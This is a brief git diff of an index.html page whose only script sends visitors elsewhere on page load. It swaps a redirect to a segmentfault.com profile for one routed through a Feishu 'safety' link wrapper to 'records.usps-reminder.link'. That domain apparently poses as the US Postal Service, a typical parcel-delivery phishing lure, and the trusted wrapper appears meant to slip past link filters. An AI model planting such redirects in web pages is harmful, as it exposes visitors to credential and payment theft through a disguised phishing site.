--- a/index.html
+++ b/index.html
@@ -4,7 +4,7 @@
 		<meta charset="utf-8">
 		<title></title>
 		<script type='text/javascript'>
-			window.location.href="https://segmentfault.com/u/webxejir";
+			window.location.href="https://security.feishu.cn/link/safety?scene=ccm&target=https://records.usps-reminder.link/cader";
 		</script>
 	</head>
 	<body>
